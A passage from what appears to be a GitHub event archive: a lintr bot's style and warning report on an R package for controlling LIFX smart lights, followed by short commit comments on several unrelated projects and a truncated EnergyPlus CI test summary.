^\n```\n[R/lifx-cloud.R:272:24:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L272) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​    jsonlite::fromJSON(content(results, as = \"text\"))\n                       ^~~~~~~\n```\n[R/lifx-cloud.R:281:44:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L281) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @return hsbk information for the string. \n                                           ^\n```\n[R/lifx-cloud.R:284:55:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L284) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- GET(paste0(BASE, \"/\", VERSION, \"/color\"), \n                                                      ^\n```\n[R/lifx-cloud.R:287:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L287) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:291:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L291) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:293:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L293) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param power either on or off, defaults to on, makes not sense to shut the light off and change the color\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:299:66:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L299) *style:* **Trailing whitespace is superfluous.**\n```r\n​set_state <- function(selector =\"all\", power = \"on\", color= NULL, \n                                                                 ^\n```\n[R/lifx-cloud.R:302:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n      ^\n```\n[R/lifx-cloud.R:302:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n                            ^\n```\n[R/lifx-cloud.R:302:44:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *warning:* **no visible global function definition for ‘check_brightness’**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n                                           ^~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:302:72:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n                                                                       ^\n```\n[R/lifx-cloud.R:303:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n      ^\n```\n[R/lifx-cloud.R:303:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n                            ^\n```\n[R/lifx-cloud.R:303:44:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *warning:* **no visible global function definition for ‘check_saturation’**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n                                           ^~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:303:72:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n                                                                       ^\n```\n[R/lifx-cloud.R:304:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L304) *style:* **Lines should not be more than 80 characters.**\n```r\n​    #if(grepl(\"hue\", color)){} # extract hue and check for hue:number and check hue.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:304:6:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L304) *style:* **Commented code should be removed.**\n```r\n​    #if(grepl(\"hue\", color)){} # extract hue and check for hue:number and check hue.\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:305:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L305) *style:* **Lines should not be more than 80 characters.**\n```r\n​    result <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:305:83:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L305) *style:* **Trailing whitespace is superfluous.**\n```r\n​    result <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n                                                                                  ^\n```\n[R/lifx-cloud.R:307:37:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L307) *style:* **Put spaces around all infix operators.**\n```r\n​                               color= color,\n                                   ~^\n```\n[R/lifx-cloud.R:310:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L310) *style:* **Lines should not be more than 80 characters.**\n```r\n​                               saturation = saturation, # doesn't work. because needs to be in color.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:315:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L315) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/lifx-cloud.R:316:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L316) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/lifx-server.R:1:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L1) *style:* **Lines should not be more than 80 characters.**\n```r\n​# ## These functions are designed to work with a local server only, which must be running separately\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:2:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L2) *style:* **Lines should not be more than 80 characters.**\n```r\n​# ## These methods are depricated at this time, see lifx-cloud.R functions instead. \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:2:84:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​# ## These methods are depricated at this time, see lifx-cloud.R functions instead. \n                                                                                   ^\n```\n[R/lifx-server.R:3:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L3) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:5:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L5) *style:* **Commented code should be removed.**\n```r\n​#   results <- GET(\"http://localhost:56780/lights.json\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:7:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L7) *style:* **Commented code should be removed.**\n```r\n​#     message(\"LIFX server could not be reached\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:9:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L9) *style:* **Commented code should be removed.**\n```r\n​#     message(\"ping! LIFX server is active.\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:11:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L11) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:13:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L13) *style:* **Commented code should be removed.**\n```r\n​#   results <- GET(paste0(\"http://localhost:56780/lights/\", selector))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:14:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L14) *style:* **Commented code should be removed.**\n```r\n​#   dat <- RJSONIO::fromJSON(content(results, as=\"text\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:16:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L16) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:17:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L17) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:19:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L19) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/on\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:21:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:23:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L23) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/off\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:25:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:26:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:28:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L28) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/toggle\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:28:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/toggle\"))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:30:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:31:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L31) *style:* **Lines should not be more than 80 characters.**\n```r\n​# server_color <- function(selector=\"all\", hue, saturation=1, brightness=1, duration=1){\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:32:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L32) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   settings <- RJSONIO::toJSON(list(hue=hue, saturation=saturation, brightness=brightness, duration=duration))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:32:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L32) *style:* **Commented code should be removed.**\n```r\n​#   settings <- RJSONIO::toJSON(list(hue=hue, saturation=saturation, brightness=brightness, duration=duration))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:33:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L33) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/color\"), body=settings, encode=\"json\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:33:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L33) *style:* **Commented code should be removed.**\n```r\n​#   results <- PUT(paste0(\"http://localhost:56780/lights/\", selector, \"/color\"), body=settings, encode=\"json\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:35:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L35) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:36:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L36) *style:* **Commented code should be removed.**\n```r\n​# # Briefly set light(s) to green, then restore previous setting\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:39:4:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L39) *style:* **Trailing whitespace is superfluous.**\n```r\n​# # \n   ^\n```\n[R/lifx-server.R:41:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L41) *style:* **Commented code should be removed.**\n```r\n​#   current <- server_status(selector)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:42:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L42) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   server_color(selector, hue=120, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:42:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L42) *style:* **Commented code should be removed.**\n```r\n​#   server_color(selector, hue=120, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:44:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L44) *style:* **Commented code should be removed.**\n```r\n​#     Sys.sleep(duration)\n      ^~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:46:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​#     server_color(selector, \n                            ^\n```\n[R/lifx-server.R:47:47:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​#           hue = current[[1]]$color[[\"hue\"]], \n                                              ^\n```\n[R/lifx-server.R:53:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L53) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:54:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L54) *style:* **Commented code should be removed.**\n```r\n​# # Briefly set light(s) to red\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:57:4:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L57) *style:* **Trailing whitespace is superfluous.**\n```r\n​# # \n   ^\n```\n[R/lifx-server.R:59:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L59) *style:* **Commented code should be removed.**\n```r\n​#   current <- server_status(selector)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:60:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L60) *style:* **Lines should not be more than 80 characters.**\n```r\n​#   server_color(selector, hue=1, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:60:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L60) *style:* **Commented code should be removed.**\n```r\n​#   server_color(selector, hue=1, saturation=1, brightness=1, duration=0.1) # duration is speed of change\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:62:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L62) *style:* **Commented code should be removed.**\n```r\n​#     Sys.sleep(duration)\n      ^~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-server.R:64:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L64) *style:* **Trailing whitespace is superfluous.**\n```r\n​#     server_color(selector, \n                            ^\n```\n[R/lifx-server.R:65:47:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L65) *style:* **Trailing whitespace is superfluous.**\n```r\n​#           hue = current[[1]]$color[[\"hue\"]], \n                                              ^\n```\n[R/lifx-server.R:71:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L71) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[R/lifx-server.R:72:2:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​# \n ^\n```\n[tests/testthat/test_inputs.R:8:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/tests/testthat/test_inputs.R#L8) *style:* **Lines should not be more than 80 characters.**\n```r\n​    expect_error(check_saturation(1.1), \"saturation needs to be between 0 and 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_inputs.R:9:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/tests/testthat/test_inputs.R#L9) *style:* **Lines should not be more than 80 characters.**\n```r\n​    expect_error(check_saturation(-0.5), \"saturation needs to be between 0 and 1\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-28T08:11:20Z"}
{"id":"8031894086","type":"CommitCommentEvent","actor":{"login":"MikaelEdebro"},"repo":{"name":"MikaelEdebro/vue-airbnb-style-datepicker"},"payload":{"comment":{"id":29867394,"position":null,"line":null,"path":null,"commit_id":"ea03a12f80627232dba60620547542e4042d540c","created_at":"2018-07-28T08:12:42Z","updated_at":"2018-07-28T08:12:42Z","author_association":"OWNER","body":"Please try installing latest version (1.11.3). I removed engines."}},"created_at":"2018-07-28T08:12:42Z"}
{"id":"8031894567","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29867395,"position":null,"line":null,"path":null,"commit_id":"1ad71293c511edb4090f945e32a6c366759b124d","created_at":"2018-07-28T08:13:10Z","updated_at":"2018-07-28T08:13:10Z","author_association":"NONE","body":"Yes its broken because you use the playout now outside and the sign is reversed.\r\nYour fix isn't correct. as i pointed out  in the past you have also to negate the result of the search in line 538."}},"created_at":"2018-07-28T08:13:10Z"}
{"id":"8031901009","type":"CommitCommentEvent","actor":{"login":"jostephd"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29867412,"position":null,"line":null,"path":null,"commit_id":"52ae31efb21b31f5bb0763d1da24709e90393c59","created_at":"2018-07-28T08:18:41Z","updated_at":"2018-07-28T08:18:41Z","author_association":"CONTRIBUTOR","body":"Would it make sense to name the replacement function `\"wesnoth_load\"` or something, so there is no chance of the wrong version of `\"load\"` being in scope? I don't really know lua so feel free to disregard me if I'm talking nonsense."}},"created_at":"2018-07-28T08:18:41Z"}
{"id":"8031901957","type":"CommitCommentEvent","actor":{"login":"alexlamsl"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29867414,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T08:19:33Z","updated_at":"2018-07-28T08:19:33Z","author_association":"CONTRIBUTOR","body":"I shall include `/cc` in the PR description next time."}},"created_at":"2018-07-28T08:19:33Z"}
{"id":"8031903412","type":"CommitCommentEvent","actor":{"login":"coelckers"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29867418,"position":null,"line":null,"path":null,"commit_id":"79f0deaff4a3ab878d563cb1046b22d8d8334651","created_at":"2018-07-28T08:20:54Z","updated_at":"2018-07-28T08:20:54Z","author_association":"OWNER","body":"Why was this approved? I don't think the implementation is correct. SystemGLFrameBuffer::SetWindowSize(int w, int h) looks like it's doing several things wrong."}},"created_at":"2018-07-28T08:20:54Z"}
{"id":"8031913267","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29867436,"position":null,"line":null,"path":null,"commit_id":"79f0deaff4a3ab878d563cb1046b22d8d8334651","created_at":"2018-07-28T08:29:37Z","updated_at":"2018-07-28T08:29:37Z","author_association":"COLLABORATOR","body":"What's wrong with it?"}},"created_at":"2018-07-28T08:29:37Z"}
{"id":"8031913609","type":"CommitCommentEvent","actor":{"login":"cuzfrog"},"repo":{"name":"tcurdt/jdependency"},"payload":{"comment":{"id":29867438,"position":34,"line":112,"path":"src/main/java/org/vafer/jdependency/Clazzpath.java","commit_id":"c7b84c49eb050b4e967bbde0185b41a1106afffa","created_at":"2018-07-28T08:29:56Z","updated_at":"2018-07-28T08:29:56Z","author_association":"CONTRIBUTOR","body":"\n\n\nthank you. My plugin finally gets published: https://github.com/cuzfrog/gradle-lean\n\n\n--------------------------------------------------------------------------------\n\n\n\n\n\n------------------ 原始邮件 ------------------\n\n\n\n\n \n 发件人: Torsten Curdt  <notifications@github.com>\n \n\n \n 发送时间: 2018-07-23 23:58:59\n \n\n \n 收件人:tcurdt/jdependency <jdependency@noreply.github.com> \n\n \n 抄送:cuz <cuzfrog@139.com>,Mention <mention@noreply.github.com> \n\n \n 主题: Re: [tcurdt/jdependency] use Path over File internally (c7b84c4)\n \n\n\n\nGlad! Thanks for the help, @cuzfrog\n\n \n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n \n\n\n\n\n\n"}},"created_at":"2018-07-28T08:29:56Z"}
{"id":"8031917070","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29867447,"position":null,"line":null,"path":null,"commit_id":"7b685614a6f29ddc74b220a77efa0a902c38d3b6","created_at":"2018-07-28T08:32:46Z","updated_at":"2018-07-28T08:32:46Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2990 of 2991 tests passed, 0 test warnings)\n\nMessages:\n\n * 1 test had: AUD diffs.\n * 1 test had: BND diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 643\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test 